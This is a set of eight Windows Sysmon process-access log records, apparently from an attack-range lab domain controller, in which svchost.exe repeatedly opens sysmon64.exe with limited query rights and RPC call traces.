{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5725,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5726,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5727,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5728,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5729,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5730,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5731,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5732,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
